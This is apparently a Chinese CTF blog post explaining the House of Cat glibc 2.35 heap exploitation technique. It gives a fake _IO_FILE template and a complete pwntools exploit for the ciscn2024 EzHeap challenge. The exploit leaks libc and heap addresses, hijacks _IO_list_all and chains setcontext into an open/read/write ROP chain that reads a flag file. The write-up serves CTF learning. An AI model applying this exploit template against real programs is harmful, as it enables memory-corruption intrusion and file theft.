[CTF]-PWN:House of Cat堆题型综合解析

  • 开发
  • 8

原理:

调用顺序:
exit->_IO_wfile_jumps->_IO_wfile_seekoff->_IO_switch_to_wget_mode

_IO_wfile_seekoff源码:

off64_t
_IO_wfile_seekoff (FILE *fp, off64_t offset, int dir, int mode)
{
  off64_t result;
  off64_t delta, new_offset;
  long int count;

  if (mode == 0)
    return do_ftell_wide (fp);

  int must_be_exact = ((fp->_wide_data->_IO_read_base
			== fp->_wide_data->_IO_read_end)
		       && (fp->_wide_data->_IO_write_base
			   == fp->_wide_data->_IO_write_ptr));

  bool was_writing = ((fp->_wide_data->_IO_write_ptr
		       > fp->_wide_data->_IO_write_base)
		      || _IO_in_put_mode (fp));
    
  if (was_writing && _IO_switch_to_wget_mode (fp))
    return WEOF;
    ......
}
libc_hidden_def (_IO_wfile_seekoff)

_IO_switch_to_wget_mode源码:

int
_IO_switch_to_wget_mode (FILE *fp)
{
  if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
    if ((wint_t)_IO_WOVERFLOW (fp, WEOF) == WEOF)
      return EOF;
  ......
}
0x7ffff7c83cb0 <_IO_switch_to_wget_mode>        endbr64 
0x7ffff7c83cb4 <_IO_switch_to_wget_mode+4>      mov    rax, qword ptr [rdi + 0xa0]
0x7ffff7c83cbb <_IO_switch_to_wget_mode+11>     push   rbx
0x7ffff7c83cbc <_IO_switch_to_wget_mode+12>     mov    rbx, rdi
0x7ffff7c83cbf <_IO_switch_to_wget_mode+15>     mov    rdx, qword ptr [rax + 0x20]
0x7ffff7c83cc3 <_IO_switch_to_wget_mode+19>     cmp    rdx, qword ptr [rax + 0x18]
0x7ffff7c83cc7 <_IO_switch_to_wget_mode+23>     jbe    _IO_switch_to_wget_mode+56
0x7ffff7c83cc9 (_IO_switch_to_wget_mode+25) ◂— mov rax, qword ptr [rax + 0xe0]
0x7ffff7c83cd5 (_IO_switch_to_wget_mode+37) ◂— call qword ptr [rax + 0x18]

我们可以伪造_IO_FILE结构体,我们可以控制执行流

#  rax1=[rdi+0xa0]

#  rdx=[rax+0x20]

#  rax2=[rax+0xe0]

#  call [rax+0x18]

fake_IO_FILE=p64(pop_rdi) #需修改地址
fake_IO_FILE+=p64(0)*7
fake_IO_FILE+=p64(1)+p64(2)
fake_IO_FILE+=p64(fake_IO_FILE_addr+0xb0)
fake_IO_FILE+=p64(setcontext+0x3d)
fake_IO_FILE=fake_IO_FILE.ljust(0x68,b'\x00')
fake_IO_FILE+=p64(0)
fake_IO_FILE=fake_IO_FILE.ljust(0x88,b'\x00')
fake_IO_FILE+=p64(heapbase+0x1000)
fake_IO_FILE=fake_IO_FILE.ljust(0xa0,b'\x00')
fake_IO_FILE+=p64(fake_IO_FILE_addr+0x30)
fake_IO_FILE=fake_IO_FILE.ljust(0xc0,b'\x00')
fake_IO_FILE+=p64(1)
fake_IO_FILE=fake_IO_FILE.ljust(0xd8, b'\x00')
fake_IO_FILE+=p64(_IO_wfile_jumps+0x30)#需修改地址
fake_IO_FILE+=p64(0)*6
fake_IO_FILE+=p64(fake_IO_FILE_addr+0x40)#rax2

fake_IO_FILE+=p64(flag_addr)
fake_IO_FILE+=p64(0)*5
fake_IO_FILE+=p64(orw_addr)*2 #需修改地址
fake_IO_FILE+=p64(ret)

这里伪造_IO_FILE结构体可以直接照着模板写 

例题(ciscn2024 初赛 EzHeap):

环境:glibc 2.35

知识点:堆溢出、House of Cat

解题思路:

利用largebin泄露出libc地址和heap地址,利用堆溢出在_IO_list_all处写入伪造_IO_FILE结构体地址,在某一堆块伪造_IO_FILE地址,在某一堆块写入orw,exit触发IO流完成ORW。

gdb查看结构体操作:

伪造后的_IO_FILE结构体:

完整exp:

from pwn import*
#context(log_level='debug')
p=process('./ezheap')

def alloc(size,content):
    p.sendlineafter(b'>>',b'1')
    p.sendlineafter(b'size:',str(size).encode('utf-8'))
    p.sendafter(b'content',content)
def free(index):
    p.sendlineafter(b'>>',b'2')
    p.sendlineafter(b'idx:',str(index).encode('utf-8'))
def edit(index,content):
    p.sendlineafter(b'>>',b'3')
    p.sendlineafter(b'idx:',str(index).encode('utf-8'))
    p.sendlineafter(b'size:',str(len(content)).encode('utf-8'))
    p.sendafter(b'content',content)
def show(index):
    p.sendlineafter(b'>>',b'4')
    p.sendlineafter(b'idx:',str(index).encode('utf-8'))

def gdbs():
    gdb.attach(p)
    pause()

alloc(0x200,b'aa')
alloc(0x420,b'aa')
alloc(0x420,b'aa')
free(1)
alloc(0x440,b'aa')
show(0)
payload=b'a'*0x210
edit(0,payload)
show(0)
onelibc=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(onelibc))
libcbase=onelibc-0x21b0d0

payload=b'a'*0x220
edit(0,payload)
show(0)
p.recvuntil(b'a'*0x220)
oneheap=u64(p.recv(6).ljust(8,b'\x00'))
print(hex(oneheap))
heapbase=oneheap-0x2510
payload=b'a'*0x200+p64(0)+p64(0x431)
edit(0,payload)
alloc(0x60,b'aa')
alloc(0x60,b'aa')
alloc(0x60,b'aa')
alloc(0x60,b'aa')
alloc(0x60,b'aa')
alloc(0x60,b'aa')
alloc(0x60,b'aa')
alloc(0x60,b'aa')
alloc(0x60,b'aa')#11
free(11)
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
IO_list_all=libcbase+libc.sym['_IO_list_all']
payload=b'a'*0x60+p64(0)+p64(0x71)+p64(((heapbase+0x19f0)>>12)^(IO_list_all))+p64(0)
edit(3,payload)

chunk0=heapbase+0x2300
chunk1=heapbase+0x2d80
chunk2=heapbase+0x2950
chunknew=heapbase+0x19f0

fake_IO_FILE_addr=chunk0+0x10
pop_rdi=libcbase+0x000000000002a3e5
pop_rsi=libcbase+0x000000000002be51
pop_rdx_r12=libcbase+0x000000000011f2e7
pop_rax=libcbase+0x0000000000045eb0
syscall=libcbase+0x91316

_IO_wfile_jumps=libcbase+0x2170c0
setcontext=libcbase+libc.sym['setcontext']
ret=libcbase+0x0000000000029139
flag_addr=chunknew+0x10
orw_addr=chunk2+0x10

fake_IO_FILE=p64(pop_rdi)
fake_IO_FILE+=p64(0)*7
fake_IO_FILE+=p64(1)+p64(2)
fake_IO_FILE+=p64(fake_IO_FILE_addr+0xb0)
fake_IO_FILE+=p64(setcontext+0x3d)
fake_IO_FILE=fake_IO_FILE.ljust(0x68,b'\x00')
fake_IO_FILE+=p64(0)
fake_IO_FILE=fake_IO_FILE.ljust(0x88,b'\x00')
fake_IO_FILE+=p64(heapbase+0x1000)
fake_IO_FILE=fake_IO_FILE.ljust(0xa0,b'\x00')
fake_IO_FILE+=p64(fake_IO_FILE_addr+0x30)
fake_IO_FILE=fake_IO_FILE.ljust(0xc0,b'\x00')
fake_IO_FILE+=p64(1)
fake_IO_FILE=fake_IO_FILE.ljust(0xd8, b'\x00')
fake_IO_FILE+=p64(_IO_wfile_jumps+0x30)#需修改地址
fake_IO_FILE+=p64(0)*6
fake_IO_FILE+=p64(fake_IO_FILE_addr+0x40)

fake_IO_FILE+=p64(flag_addr)
fake_IO_FILE+=p64(0)*5
fake_IO_FILE+=p64(orw_addr)*2
fake_IO_FILE+=p64(ret)
edit(0,fake_IO_FILE)

orw=p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(0)+p64(pop_rdx_r12)+p64(0)+p64(0)+p64(pop_rax)+p64(2)+p64(syscall)
orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(heapbase+0x1000)+p64(pop_rdx_r12)+p64(0x100)+p64(0)+p64(pop_rax)+p64(0)+p64(syscall)
orw+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(heapbase+0x1000)+p64(pop_rdx_r12)+p64(0x100)+p64(0)+p64(pop_rax)+p64(1)+p64(syscall)
edit(2,orw)

print("orw="+hex(orw_addr))
print("setcontext3d="+hex(setcontext+0x3d))
print("pop_rdi="+hex(pop_rdi))
alloc(0x60,b'flag\x00')#flag_addr
alloc(0x60,p64(fake_IO_FILE_addr))
p.sendlineafter(b'>>',b'5')

p.interactive()

阅读全部

相关推荐

  5. C++结构与排序深度

    2024-07-10 13:36:05       16 阅读

  9. xdoj结构体,综合,考试排名,拼数字

    2024-07-10 13:36:05       38 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-10 13:36:05       4 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-10 13:36:05       5 阅读

  9. 在Django里面运行非项目文件

    2024-07-10 13:36:05       4 阅读

  19. Python语言-面向对象

    2024-07-10 13:36:05       5 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-07-10 13:36:05       5 阅读

热门阅读

  1. react小白面试不得不会的20个问题——第二篇

    2024-07-10 13:36:05       11 阅读

  3. 简单滤波算法伪码

    2024-07-10 13:36:05       13 阅读

  4. 【Eureka服务治理深度解析】探索灰度发布的实现之道

    2024-07-10 13:36:05       10 阅读

  5. Mongodb索引简介

    2024-07-10 13:36:05       7 阅读

  6. Linux 6种日志查看方法

    2024-07-10 13:36:05       11 阅读

  7. 案例研究(Case Study)是什么?怎么写?

    2024-07-10 13:36:05       8 阅读

  8. Linux虚拟化技术:从Xen到KVM

    2024-07-10 13:36:05       8 阅读

  10. Msql数据库使用技巧:使用视图(View)来简化复杂查询,视图的优势和带来的便利

    2024-07-10 13:36:05       9 阅读

  13. 深度学习图片增强方式

    2024-07-10 13:36:05       10 阅读

  14. 什么是DNS欺骗

    2024-07-10 13:36:05       14 阅读

  15. leetcode hot 100 刷题记录

    2024-07-10 13:36:05       11 阅读

  16. 全面解析C#:现代编程语言

    2024-07-10 13:36:05       9 阅读

  20. 【深入探索】揭秘SQL Server的多重身份验证模式

    2024-07-10 13:36:05       7 阅读

  23. 短链接day3

    2024-07-10 13:36:05       10 阅读

  27. [C++基础]C++ 10个常用案例

    2024-07-10 13:36:05       12 阅读

  29. android paddingStart paddingLeft 使用区别

    2024-07-10 13:36:05       13 阅读

  30. 【ARMv8/v9 GIC 系列 5.7 -- 中断路由与系统寄存器】

    2024-07-10 13:36:05       10 阅读